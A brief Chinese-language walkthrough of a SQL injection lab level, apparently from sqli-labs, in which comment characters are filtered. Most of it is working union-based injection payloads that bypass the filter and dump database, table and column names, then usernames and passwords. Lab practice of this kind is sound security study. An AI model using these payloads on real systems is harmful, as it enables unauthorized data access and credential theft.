z这关就很神奇了 末尾的闭合符号– 和#均被过滤 那么只好用单引号闭合 因为单引号里面的不会被执行 所以用and 闭合 ?id=1’ and ‘1’=’1
测试回显 ?id=-1’ union select 1,2,3 and ‘1’=’1 显示的消息是 your login name:2 your password:1
那么就从select1,2,3的2那边入手
?id=-1’ union select 1,database(),3 and ‘1’=’1 得到库名 security
?id=-1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=’security’),3 and ‘1’=’1 爆表明
?id=-1’ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’),3 and ‘1’=’1 爆列名
?id=-1’ union select 1,(select group_concat(username,password) from users),3 and ‘1’=’1 查数据